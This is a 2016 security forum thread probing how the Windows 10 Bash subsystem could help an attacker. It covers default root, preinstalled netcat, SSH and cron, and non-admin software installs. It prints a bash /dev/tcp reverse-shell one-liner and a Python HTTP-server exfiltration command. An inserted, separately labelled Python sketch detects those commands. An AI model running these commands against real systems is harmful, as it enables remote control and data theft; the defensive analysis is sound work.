BASH on Windows 10

_VL_

I assume everyone is familiar with this:

 

Quote

You can now run Bash scripts, Linux command-line tools like sed, awk, grep, and you can even try Linux-first tools like Ruby, Git, Python, etc. directly on Windows. You can also access your Windows filesystem from within Bash allowing you to work on the same set of files using your preferred Windows tools or Linux command-line tools

https://blogs.windows.com/buildingapps/2016/03/30/run-bash-on-ubuntu-on-windows/

 

What advantages does this bring to an attacker if a developer installs this? I installed Windows 10 on a VM and then went through the process of updating to Insider Preview build 14316.

To start BASH you open cmd.exe and type in "bash" in the same way you would to start PowerShell from cmd. You'll notice that you instantly have root. There is no need to "su".

I tried writing to "C:\Windows" as a test and got a write permission error. I'm assuming it has something to do with how the Windows volume is mounted. I'm still trying to find a way around that.

I've only just begun playing with it, but so far I found the following installed by default:

  • Netcat
  • Perl
  • Python

I was able to use the following payload to get a reverse listener:

bash -i >& /dev/tcp/<ip_address>/<port> 0>&1

Since Python is installed this is another option for data extraction:

python -m SimpleHTTPServer <port>

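A detection-side view of the post above, as an added example that is not part of the original thread: a Python sketch that scans process-creation records for bash.exe launches and for the two command lines the post shows. The record layout, the sample events, the address and ports, and the rule names are constructed assumptions, and the `http.server` match generalizes the post's `SimpleHTTPServer` to its Python 3 name.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Constructed records (not real logs). Assumed layout, one event per line:
# parent image | image | elevated (yes/no) | command line
SAMPLE_EVENTS = r"""
C:\Windows\System32\cmd.exe|C:\Windows\System32\bash.exe|no|bash
C:\Windows\System32\cmd.exe|C:\Windows\System32\bash.exe|no|bash -c "bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"
C:\Windows\System32\cmd.exe|C:\Windows\System32\bash.exe|no|bash -c "python -m SimpleHTTPServer 8000"
C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|no|notepad.exe notes.txt
C:\Windows\System32\cmd.exe|C:\Windows\System32\bash.exe|yes|bash -c "ls /mnt/c/Windows"
""".strip()

# Command-line patterns taken from the commands quoted in the post.
RULES = {
    # bash's /dev/tcp/<host>/<port> pseudo-device used in a redirection
    "dev_tcp_redirect": re.compile(r"/dev/tcp/[^/\s]+/\d+"),
    # ad-hoc web server started from the Python standard library
    "python_http_server": re.compile(
        r"python[\d.]*\s+-m\s+(SimpleHTTPServer|http\.server)"),
}


def classify(line):
    """Return the findings for one record (empty list if not bash.exe)."""
    _parent, image, elevated, cmdline = line.split("|", 3)
    if basename(image).lower() != "bash.exe":
        return []
    # A launch from an elevated parent is tagged separately, because the
    # Linux root user acts with the rights of the launching Windows user.
    findings = ["bash_launch_elevated" if elevated == "yes" else "bash_launch"]
    findings += [name for name, rx in RULES.items() if rx.search(cmdline)]
    return findings


def scan(text):
    """Map 1-based record number -> findings, skipping clean records."""
    hits = {}
    for number, line in enumerate(text.splitlines(), 1):
        found = classify(line)
        if found:
            hits[number] = found
    return hits


if __name__ == "__main__":
    for number, found in scan(SAMPLE_EVENTS).items():
        print(number, ", ".join(found))
```

Only the bash.exe command line is inspected here, so commands typed interactively inside an already open bash session are outside what this sketch sees.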
GiRa

I still have to try it but the very first things that come to mind are:

- service for you plus bash or nc to get persistence
- check if there is a cron implementation of some kind
- check for ssh
- messing around with the *nix permissions vs the Windows permissions, I bet there is something funky there

 

_VL_
On 4/13/2016 at 1:30 AM, GiRa said:

I still have to try it but the very first things that come to mind are:

- service for you plus bash or nc to get persistence
- check if there is a cron implementation of some kind
- check for ssh
- messing around with the *nix permissions vs the Windows permissions, I bet there is something funky there

 

SSH is installed as well as OpenSSH server:

Quote

root@localhost:/mnt/c/Users/test# apt-get install openssh-server
Reading package lists... Done
Building dependency tree
Reading state information... Done
openssh-server is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
root@localhost:/mnt/c/Users/test#

Cron is also installed, much to my surprise.

Just found this article:

http://www.pcworld.com/article/3051604/windows/linuxs-deadliest-command-doesnt-faze-bash-on-windows-10.html

Seems that Root != Administrator on Windows. That's important to note.

_VL_

Yes. I should have guessed this. Once I opened cmd.exe as administrator I then had permissions from within BASH to write to "C:\Windows".

_VL_

So this is interesting. I created a normal user on Windows 10 (not an administrator), switched to the account and had this experience:

 

  1. Typed in "BASH". This made me type "y" again, download BASH from the Windows Store and install it. # remember that this is without Administrative rights.
  2. I was then able to install whatever I want from BASH without administrative rights.

Seems like this is ripe for abuse. One example, I was able to install NMAP.

I did run into this when I tried to run a scan:

Quote

root@localhost:/mnt/c/Users/test# nmap scanme.nmap.org

Starting Nmap 6.40 ( http://nmap.org ) at 2016-04-14 22:44 UTC
route_dst_netlink: cannot create AF_NETLINK socket: Invalid argument

Seems like they haven't completely integrated all of Linux's networking features into BASH for Windows yet.
